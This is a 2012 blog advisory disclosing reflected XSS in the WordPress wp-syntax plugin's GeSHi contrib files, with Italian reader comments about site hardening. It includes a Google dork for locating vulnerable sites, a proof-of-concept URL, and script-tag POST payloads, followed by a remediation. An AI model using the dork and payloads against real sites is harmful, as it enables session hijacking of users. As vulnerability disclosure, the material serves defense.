MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

24Sep/122

WordPress Plugin wp-syntax (default installation) Cross Site Scripting (XSS)

################################################################
# Exploit Title: Wordpress Plugin wp-syntax (default installation) Cross Site Scripting (XSS)
# Google Dork: inurl:wp-content/plugins/wp-syntax
# Date: 24/09/12
# Exploit Author: MondoUnix
# Site: http://www.mondounix.com
# Software : wordpress wp-syntax plugin
################################################################
 
Vulnerability description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
 
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
 
This vulnerability affects :
/wp-content/plugins/wp-syntax/geshi/contrib/example.php
/wp-content/plugins/wp-syntax/geshi/contrib/langwiz.php
 
The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. 
 
POC (Proof of concept) :
 
# example.php
 
http://SITE/wp-content/plugins/wp-syntax/geshi/contrib/example.php/%F6%22%20onmouseover=prompt(942420)%20
 
# langwiz.php
 
URL encoded POST input ld%5bcmt%5d%5bsl%5d%5b2%5d%5bstart%5d was set to '"()&%1<ScRiPt >prompt(977197)</ScRiPt>
URL encoded POST input ld%5bstr%5d%5bec%5d%5bstyle%5d was set to '"()&%1<ScRiPt >prompt(936249)</ScRiPt>
URL encoded POST input ld%5bcmt%5d%5brxc%5d%5b1%5d%5bstyle%5d was set to '"()&%1<ScRiPt >prompt(939475)</ScRiPt>
 
Solution :
 
Remove or backup on secure place default installation directory "contrib" .
 
# www.mondounix.com

(2458)

Commenti (2) Trackback (0)
  1. pochi giorni fa mi hanno iniettato del codice in alcuni file di wordpress e guarda caso ho questo plugin e la cartella contrib… penso che sia stata opera di un hashing scanner :-|

    • Oltre a scansioni mirate potrebbero aver usato semplici tool automatici per l’individuazione di falle di sicurezza .
      Ti consiglio di installare mod_security (per apache) e fail2ban .
      Leggi attentamente la documentazione e controlla la configurazione (quella di base può essere “bloccante”)


Inserisci un commento

Ancora nessun trackback.